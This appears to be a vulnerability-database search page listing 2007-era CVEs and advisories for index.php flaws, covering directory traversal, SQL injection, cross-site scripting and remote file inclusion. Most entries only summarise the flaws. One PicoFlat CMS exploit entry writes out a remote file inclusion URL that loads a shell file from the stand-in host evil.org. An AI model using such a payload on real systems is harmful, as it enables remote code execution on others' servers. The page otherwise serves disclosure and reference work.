7210 matches found
PHP File Sharing System Index.PHP目录遍历漏洞
PHP File Sharing System是一款基于PHP的WEB应用程序。 PHP File Sharing System不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。 问题是由于'index.php'脚本对用户提交的WEB参数缺少过滤,提交包含"../"字符作为参数数据,可绕过WEB ROOT限制,以WEB权限查看系统文件内容。 PHP File Sharing System 1.5.1 目前没有详细解决方案提供: http://sourceforge.net/projects/phpfilesadmin/...
CVE-2007-5485
SQL injection vulnerability in index.php in the mg2 1.0 module for KwsPHP allows remote attackers to execute arbitrary SQL commands via the album parameter...
CVE-2007-5485
CVE-2007-5485 affects the mg2 1.0 module for KwsPHP. The vulnerability is a SQL injection in index.php via the album parameter, allowing remote attackers to execute arbitrary SQL commands. Exploitation details are not provided in the connected documents; no specific exploit status or in-the-wild ...
CVE-2007-5485
SQL injection vulnerability in index.php in the mg2 1.0 module for KwsPHP allows remote attackers to execute arbitrary SQL commands via the album parameter...
[Full-disclosure] PHP File Sharing System 1.5.1
PHP File Sharing System - Directory traversal +--------------------------------------------+ Author: Jonas Thambert Date: 2007-10-13 URL: http://sourceforge.net/projects/phpfilesadmin/ Vendor Notified. Version: 1.5.1 latest - Description - PHP File Sharing System is vulnerable to directory...
Sql injection
SQL injection vulnerability in index.php in the newsletter module 1.0 for KwsPHP, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the newsletter parameter...
CVE-2007-5458
CVE-2007-5458 describes an SQL injection in index.php of the KwsPHP newsletter module 1.0. The vulnerability occurs when magic_quotes_gpc is disabled, allowing remote attackers to inject arbitrary SQL via the newsletter parameter. This is supported by multiple connected records (NVD/NVD listing, ...
Sql injection
SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...
CVE-2007-5425
SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...
picoflat-rfi.txt
PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...
PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ==================================================================== PicoFlat CMS EXPLOIT: http://x.com/index.php?pagina=http://evil.org/shell.txt? 0day.today 2018-04-12...
PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion
PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...
PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
No description provided by source. PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny...
CVE-2007-5297
Cross-site scripting XSS vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
CVE-2007-5297
CVE-2007-5297 affects Minki 1.30, with a vulnerability in index.php where the page parameter enables cross-site scripting (XSS). The root cause is insufficient input handling in the affected script, allowing injection of arbitrary script/HTML by remote attackers. Public exploitation details or co...
CVE-2007-5297
Cross-site scripting XSS vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
CVE-2007-5295
CVE-2007-5295 affects Wikepage Opus 13 2007.2 and TipiWiki 2, via index.php. The underlying issue is multiple cross-site scripting (XSS) vulnerabilities that allow remote attackers to inject arbitrary script or HTML through the PageContent and PageName parameters. Reported impact per NVD is a Par...
CVE-2004-2688
Cross-site scripting XSS vulnerability in index.php in NewsPHP allows remote attackers to inject arbitrary web script or HTML via the catid parameter. NOTE: this issue might overlap vector 3 in CVE-2006-3358...
CVE-2004-2688
CVE-2004-2688 / CVE-2006-3358 describe multiple XSS vulnerabilities in NewsPHP’s index.php. The issue is triggered by unsanitized user input through the cat_id parameter (and other vectors in related CVEs), which can cause arbitrary web script/HTML to be injected and reflected in error pages. The...
CVE-2007-5235
The CVE-2007-5235 entry describes a Cross-site Scripting (XSS) vulnerability in Uebimiau, specifically in index.php for versions 2.7.2 through 2.7.10. The issue allows remote attackers to inject arbitrary web script or HTML via the f_email parameter. The provided documents do not include explicit...